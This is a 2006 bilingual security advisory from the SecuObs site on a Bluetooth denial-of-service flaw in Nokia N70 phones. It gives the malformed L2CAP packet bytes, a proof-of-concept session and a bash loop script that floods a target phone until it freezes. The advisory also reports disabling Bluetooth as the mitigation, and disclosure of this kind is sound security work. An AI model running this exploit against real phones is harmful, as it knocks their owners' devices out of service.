[Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70 SecuObs - L'observatoire de la sécurite internet - Site d'informations professionnelles francophone sur la sécurité informatique

Failles

Les derniers commentaires publiés sur SecuObs (1-5):

- ESRT @netsparker @jeremiahg - Scanner Review Vendors begin responding: HP Web - ESRT @dloss - Python tools for penetration testers - ESRT @sagar38 @laramies @matalaz - Pyew A Python tool to analyze malware - synspam 0.4.0-1 - sipwitch 0.7.0 Les derniers commentaires publiés sur SecuObs (6-25) Tous les commentaires publiés sur SecuObs avant les 5 derniers

English version with Google Translate

[Infratech - vulnérabilité] Un Deuxième type de Déni de Service sur NOKIA N70

Par Pierre Betouin, secuobs.com
Le 15/02/2006

Résumé : Un deuxième type de Déni de Service a été identifié sur le modèle N70 des téléphones portables de la marque Nokia. Cette faille, trouvée à l'aide de Bluetooth Stack Smasher, permet de rendre inutilisable ce type de téléphones. - Lire l'article

Version imprimable de cet article

Voir les commentaires de cet article
Voir les commentaires de la catégorie Failles
Voir l'ensemble des commentaires SecuObs
Suivre uniquement les commentaires de cet article en RSS

Suivre l'ensemble des commentaires SecuObs en RSS
Suivre tous les commentaires de la categorie Failles en RSS

[Version francaise] - [English version]

La plupart des téléphones mobiles de la marque Nokia sont vendus avec des fonctions Bluetooth. Ces fonctions ne sont pas activées par défaut.

Plus d'informations sur les téléphones de cette marque sur lien

L'envoi de paquets malformés peut provoquer sur les modèles n70 de la marque un Déni de Service (DoS) au minimum, cette faille a été trouvée avec l'utilitaire de fuzzing Bluetooth Stack Smasher v0.6 (cf. nouvelle version BSS 0.8 sur lien ).

Lors de la réception de nombreux paquets malformés de type L2CAP, le téléphone cellulaire Nokia n70 peut voir son activité ralentie puis figée (freeze) au bout d'une période de 30 secondes environ. La seule manière de reprendre la main étant alors de stopper le téléphone via le bouton d'arrêt/démarrage qui se fait surement par l'envoi d'une interruption RT.

Le paquet L2CAP responsable du DoS est le suivant :

7D AF 00 00 41 41 41

Avec :

Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)

0x41 représentant les octects de remplissage aléatoire (padding)

D'autres modèles de la marque Nokia peuvent être affectés, ils doivent être testés avec l'utilitaire de fuzzing précédemment cité BSS.

Aucune mise à jour du "Firmware" (logiciel embarqué) n'est disponible pour le moment, la seule solution envisageable est de désactiver les fonctions Bluetooth lorsque vous n'en avez pas besoin.

Un nouveau "Firmware" sera peut être mis à disposition par le constructeur sous peu.

Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss

Loop.sh étant le suivant :

#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre Betouin pierre.betouin@infratech.fr
# Feb 14 11:21:58 GMT+1 2006

echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre Betouin pierre.betouin@infratech.fr"
echo ""
if (( $# < 1 )); then
echo "Usage: $0 <btdaddr> (uses replay_l2cap_packet_nokiaN70)"
exit
fi

if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
echo ""
read
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)
./replay_l2cap_packet_nokiaN70 $1
done
else
echo "You must compile replay_l2cap_packet_nokiaN70 before"
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
exit

fi

Vous pouvez télécharger replay_l2cap_packet_nokiaN70.c sur lien

Autres ressources sur la sécurité Bluetooth :

[Dossier Sécurité Bluetooth - partie 1] Introduction aux technologies Bluetooth lien

[Dossier Sécurité Bluetooth - partie 2] Présentation des utilitaires Bluetooth lien

[Dossier Sécurité Bluetooth - partie 3] Les attaques génériques lien

[Dossier Sécurité Bluetooth - partie 4] Les attaques d'implémentations lien

[Dossier Sécurité Bluetooth - partie 5] Scénarios possibles & synthèse lien

[Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson lien

[Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson lien

[Infratech - vulnérabilité] PoC pour le DoS sur hcidump lien

[Infratech - vulnérabilité] Déni de Service sur hcidump lien

[Infratech - release] BSS - Bluetooth Stack Smasher v0.6 lien

[Infratech - vulnérabilité] Déni de Service sur Nokia N70 lien

[English Version] - [Version francaise]

Most of Nokia cell phones sold now are Bluetooth compliant. Bluetooth is not enabled by default.
Lots of users use it with several other devices (earsets, GPS systems, and so on).

More information about these devices on lien

Bluetooth technology uses at the lowest level a L2CAP layer for multiplexing and "access to media" purposes.

Other upper protocols, such as RFCOMM or SDP, use it for instance.

Malformed packets can lead to, at least, a denial of service on affected devices. This flaw was found using the BSS tool ( Bluetooth Stack Smasher new release v0.8 : lien ).

When receiving numerous short buggy L2CAP packets, Nokia N70 cellular phones begin to be slower and then freeze after a short period (within 30 seconds). The only available button is the "halt button" located at the top of the phone (maybe controlled by a RT interruption) which allows users to shut down their device.

L2CAP packets responsible of the crash are :
7D AF 00 00 41 41 41

Where:
Code field 0x7D (1 byte)
Ident field 0xAF (1 byte)
Length field 0x0000 (2 bytes)

0x41 bytes are random padding.

Other Nokia devices may be affected and should be tested with BSS fuzzer. Solution is to switch off bluetooth on the phone. A firmware upgrade may be distributed later by Nokia.

Proof of Concept :
------------------
# l2ping -c 3 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 44) ...
0 bytes from 00:15:A0:XX:XX:XX id 0 time 64.18ms
0 bytes from 00:15:A0:XX:XX:XX id 1 time 43.94ms
0 bytes from 00:15:A0:XX:XX:XX id 2 time 37.25ms
3 sent, 3 received, 0% loss

# ./loop.sh 00:15:A0:XX:XX:XX
(.. snip ..)

# l2ping -c 1 00:15:A0:XX:XX:XX
Ping: 00:15:A0:XX:XX:XX from 00:20:E0:75:83:DA (data size 248) ...
no response from 00:15:A0:XX:XX:XX id 0
1 sent, 0 received, 100% loss

Loop.sh as follows :

#!/bin/bash
# Another Nokia N70 Bluetooth remote Denial of Service
# Pierre Betouin pierre.betouin@infratech.fr
# Feb 14 11:21:58 GMT+1 2006

echo "Another Nokia N70 Bluetooth remote Denial of Service"
echo "Pierre Betouin pierre.betouin@infratech.fr"
echo ""
if (( $# < 1 )); then
echo "Usage: $0 <btdaddr> (uses replay_l2cap_packet_nokiaN70)"
exit
fi

if [ -x ./replay_l2cap_packet_nokiaN70 ]; then
echo "Kill this prog with \"killall -9 loop.sh\" in another terminal."
echo "PRESS ENTER TO LAUNCH THE DoS (or Ctrl-c to exit now)"
echo ""
read
while (( 1 )); do # Infinite loop, a bit dirty, we must say ;)
./replay_l2cap_packet_nokiaN70 $1
done
else
echo "You must compile replay_l2cap_packet_nokiaN70 before"
echo "gcc -lbluetooth -o replay_l2cap_packet_nokiaN70 replay_l2cap_packet_nokiaN70.c"
exit

fi

You can download replay_l2cap_packet_nokiaN70.c on lien

Author Website on lien

Les articles de la revue de presse sur les mots clés : nokia
Les videos sur SecuObs pour les mots clés : nokia
Voir tous les articles de "Pierre Betouin" publiés sur SecuObs (17 résultats)
Voir tous les articles publiés par l'organisme "secuobs" sur SecuObs (757 résultats)

Version imprimable de cet article

Voir les commentaires de cet article
Voir les commentaires de la catégorie Failles
Voir l'ensemble des commentaires SecuObs
Suivre uniquement les commentaires de cet article en RSS

Suivre l'ensemble des commentaires SecuObs en RSS
Suivre tous les commentaires de la categorie Failles en RSS

- Article suivant : [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Article précédent : [Infratech - vulnérabilité] Déni de Service sur NOKIA N70
- Article suivant dans la catégorie Failles : [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Article précédent dans la catégorie Failles : [Infratech - vulnérabilité] Déni de Service sur NOKIA N70

Les derniers commentaires publiés pour cet article:

- Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of ...

Les derniers commentaires de la catégorie Failles:

- PS3 hypervisor exploit reproduced ... - Oracle Patches Critical WebLogic Flaw ... - Get your Faraday Bag ... - openssh-53p1-remote-root.c ... - WordPress iframe injection ...

Les derniers articles de la catégorie Failles :

- Une attaque contre l’algorithme A5/3 - Avis d’avalanche de 0days chez Intevydis - Preuve de concept pour contourner les restrictions d accès DMA via l exploitation d une vulnérabilité d Intel TXT - Des millions de XSS dans les clicktags - Les imprimantes réseau, toujours un maillon faible de la sécurité informatique - Preuve de concept pour subtiliser des mots de passe Twitter en MITM via la faille SSL/TLS - ActionScript facilite le Heap Spraying pour l exploitation des vulnérabilités Microsoft Office - Récupérer la clé cryptographique secrète d un appareil mobile via l attaque Differential Power Analysis ou le rayonnement électromagnétique - Croisements protocolaires et XSS par réflexions à travers des services non HTTP en écoute sur des ports non standards - Un certificat SSL Wildcard pour renforcer l efficacité des attaques Man In The Middle + d'articles de la catégorie Failles

Les derniers commentaires publiés sur SecuObs (6-25):

- Airdrop-ng Release - GuruPlug, the next generation of SheevaPlug - Anomos 0.9 Released Public Tracker Up and Running - ESRT @IBMFedCyber - DECT crypto cracked academically - Responder Professional 2.0, a Windows physical memory and automated malware a - ESRT @Marsmensch @hdmoore - Metasploit supports owning insecure IIS WebDAV - Added a small hack to ronin-ext, Ronin::Autoload: autoloads missing constants - ESRT @proactivedefend - Iptables Limits Connections Per IP - ESRT @EdiStrosar @spendergrsec - Linux 2618+ infoleak exploit added to Enligh - ESRT @SecMailLists - Full Disclosure: XSS vulnerability in NEW orkut - ESRT @helpnetsecurity @lbhuston - Zero-day vulnerabilities on the market - ESRT @agar38 @achillean @theprez98 - SHODAN for Penetration Testers slides fr - Video : ESRT @secdocs - Using OpenBSC for fuzzing of GSM handsets - ESRT @helpnetsecurity - Configure Netfilter Shorewall 4.4.7 RC2 released - PS3 hypervisor exploit reproduced - Mozilla Removes Two Malicious Firefox Add-Ons - Wrapping insecure web apps with Apache - Oracle Patches Critical WebLogic Flaw - Directory traversal as a reconnaissance tool - Video : Scanning with the NetChk Configure NIST Policy Les cinq derniers commentaires publiés sur SecuObs Tous les commentaires publiés sur SecuObs avant les 25 derniers

SecuToolBox :

Bluetooth Stack Smasher v0.6 / Bluetooth Stack Smasher v0.8 / Slides Bluetooth Eurosec 2006 / Exposé vidéo Windows Shellcode - Kostya Kortchinsky / Exposé audio Reverse Engineering - Nicolas Brulez / Exposé vidéo Securitech - Pierre Betouin / WEP aircrack + Ubiquiti (MadWifi) 300 mW + Yagi / Secure WIFI WPA + EAP-TLS + Freeradius / Audit Windows / Captive Password Windows / USBDumper / USBDumper 2 / Hacking Hardware / WishMaster backdoor / DNS Auditing Tool / Ettercap SSL MITM / Exploit vulnérabilités Windows / Memory Dumper Kernel Hardening / Reverse Engineering / Scapy / SecUbuLIVE CD / Metasploit / eEye Blink Sec Center / eEye Retina Scanner + d'outils / + de tutoriels

Mini-Tagwall des articles publiés sur SecuObs :

sécurité, exploit, windows, microsoft, réseau, attaque, vulnérabilité, outil, système, audit, virus, internet, données, présentation, linux, metasploit, protocol, bluetooth, vista, shell, scanner, réseaux, rootkit, paquet, trames, source, conférence, téléphone, wishmaster, noyau, engineering, mobile, sysun, https, téléphones, mémoire, patch, intel, botnet, libre, rapport, scapy, reverse, contourner, securitech + de mots clés avec l'annuaire des articles publiés sur SecuObs

Archives Failles Secunia :

- SA38414 Fedora update for gmime22 - SA38429 Debian update for squid and squid3 - SA38461 Ubuntu update for kernel - SA38476 F5 Products TCP Implementation Denial of Service - SA38377 Fedora update for dokuwiki + d'archives failles avec Secunia et SecuMail

Archives Mailing Full Disclosure :

- Full-disclosure Claude Mercier/CLSC-CHSLD BVLV/Reg03/SSSS est absent(e). - Re: Full-disclosure about jit and dep+aslr - Re: Full-disclosure about jit and dep+aslr - Re: Full-disclosure about jit and dep+aslr - Re: Full-disclosure about jit and dep+aslr + d'archives Full Disclosure avec SecuMail

Archives Mailing Bugtraq :

- CORELAN-10-010 - GeFest Web HomeServer v1.0 Remote Directory Traversal Vulnerability - DSECRG-09-065 TVUPlayer PlayerOcx.ocx ActiveX - Insecure method - mongoose Space Character Remote File Disclosure Vulnerability - Suspected SpamVulnerability in Tagcloud for DataLife Engine - Re: Multiple vulnerabilities in XAMPP (advisory #7) - Re: Samba Remote Zero-Day Exploit + d'archives Bugtraq avec SecuMail

Mini-Tagwall de l'annuaire video :

vmware, security, virus, biometric, windows, lockpicking, password, metasploit, botnet, tutorial, crypt, attack, linux, network, iphone, server, exploit, wimax, conficker, virtu, virtual, engineering, cisco, reverse, ettercap, wireshark, hacker, firewall, knoppix, arduino, internet, rootkit, wireless, source, brucon, backtrack, openbsd, systm, overflow, openssh, conference, buffer, access, remote, defcon + de mots clés avec l'annuaire des videos

Mini-Tagwall des articles de la revue de presse :

security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité + de mots clés avec l'annuaire de la revue de presse

Mini-Tagwall des Tweets de la revue Twitter :

security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack + de mots clés avec l'annuaire de la revue Twitter